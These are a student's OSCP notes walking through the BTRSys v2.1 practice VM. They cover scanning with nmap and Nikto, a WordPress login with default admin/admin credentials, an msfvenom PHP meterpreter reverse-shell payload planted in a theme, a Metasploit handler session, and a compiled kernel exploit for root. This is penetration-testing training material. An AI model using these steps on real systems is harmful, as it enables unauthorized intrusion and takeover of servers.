OSCP Learning Notes - Capstone(2)
BTRSys v2.1 Walkthrough
Download the BTRSys virtual machine from the following website:
1. Find the IP address of the BTRSys virtual machine.
netdiscover -r
2. Perform the TCP/UDP scan using Nmap to find the potential vulnerabilities.
nmap -Pn -sS --stats-every 3m --max-retries --max-scan-delay --defeat-rst-ratelimit -T4 -p1- -oN /root/Delete/tcp1.txt
nmap -nvv -Pn- -sSV -p ,, --version-intensity -A -oN /root/Delete/tcp2.txt
nmap -Pn --top-ports -sU --stats-every 3m --max-retries -T3 -oN /root/Delete/udp.txt
3. Browse the target website( through Firefox.
4. Try to scan the file structure of the target server using the tool Nikto.
nikto -h
Browse the target website( through Firefox.
Browse the target website( through Firefox.
Try to login in the WordPress using default username/password(admin/admin).
Ahaaa! Login in the admin page successfully.
Go to the Edit Themes page.
5. List all the payload in Kali Linux
msfvenom -l payload
Set the payload module and parameters.
msfvenom -p php/meterpreter/reverse_tcp lhost= lport= -f raw
Copy, Paste and upload the generated PHP exploit code to the Wordpress website.
6. Start the Metasploit on the Kali Linux and choose the proper module. Then set the payload module and parameters.
use exploit/multi/handler set payload php/meterpreter/reverse_tcp set lhost
Browse the edited page( through Firefox.
So the communication between Kali Linux and BTRSys is established.
Execute the command help to find the commands we can grab.
Core Commands
============= Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the server to another process
pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
secure (Re)Negotiate TLV packet encryption on the session
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel Stdapi: File system Commands
============================ Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
chmod Change the permissions of a file
cp Copy source to destination
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory Stdapi: Networking Commands
=========================== Command Description
------- -----------
portfwd Forward a local port to a remote service Stdapi: System Commands
======================= Command Description
------- -----------
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getuid Get the user that the server is running as
kill Terminate a process
localtime Displays the target system's local date and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote system, such as OS Stdapi: Audio Output Commands
============================= Command Description
------- -----------
play play an audio file on target system, nothing written on disk
Find the Kernel version and current username of the BTRSys server.
sysinfo getuid
7. Try to find the vulnerabilities related to Linux ubuntu 4.4.0-62-generic in the Exploit Database. Then download and copy the exploit code file to the folder /var/www/html.
Compile the source code and download the executable file to BTRSys server.
gcc -o exploit .c
Ahaaa! We get the root privilege by executing the exploit file.
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